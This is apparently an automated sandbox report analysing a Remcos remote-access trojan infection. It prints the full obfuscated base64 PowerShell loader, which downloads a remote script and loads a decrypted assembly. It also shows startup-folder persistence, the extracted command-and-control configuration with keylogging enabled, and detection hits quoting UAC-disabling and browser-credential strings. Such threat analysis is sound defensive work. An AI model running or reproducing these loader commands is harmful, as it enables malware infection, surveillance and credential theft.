Q29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2440 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aa280a72.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1672 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aa280a72.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000045.00000002.3697036706.0000000006222000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x230ea:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    0000002B.00000002.2404458461.0000000008C77000.00000002.10000000.00040000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000026.00000002.2225364286.000000000905C000.00000002.10000000.00040000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x708:$a1: Remcos restarted by watchdog!
      • 0xc80:$a3: %02i:%02i:%02i:%03i
      00000015.00000002.1738368992.0000000008969000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000015.00000002.1682233166.00000000031AF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 98 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.powershell.exe.9111288.3.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            11.2.powershell.exe.9111288.3.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              11.2.powershell.exe.9111288.3.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                11.2.powershell.exe.9111288.3.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6ad08:$a1: Remcos restarted by watchdog!
                • 0x6b280:$a3: %02i:%02i:%02i:%03i
                11.2.powershell.exe.9111288.3.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64f94:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64f10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64f10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65410:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x65a10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x65004:$str_b2: Executing file:
                • 0x65e4c:$str_b3: GetDirectListeningPort
                • 0x65800:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x65980:$str_b7: \update.vbs
                • 0x6502c:$str_b9: Downloaded file:
                • 0x65018:$str_b10: Downloading file:
                • 0x650bc:$str_b12: Failed to upload file:
                • 0x65e14:$str_b13: StartForward
                • 0x65e34:$str_b14: StopForward
                • 0x658d8:$str_b15: fso.DeleteFile "
                • 0x6586c:$str_b16: On Error Resume Next
                • 0x65908:$str_b17: fso.DeleteFolder "
                • 0x650ac:$str_b18: Uploaded file:
                • 0x6506c:$str_b19: Unable to delete:
                • 0x658a0:$str_b20: while fso.FileExists("
                • 0x65549:$str_c0: [Firefox StoredLogins not found]
                Click to see the 7 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: Suspicious PowerShell Parameter Substring
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9T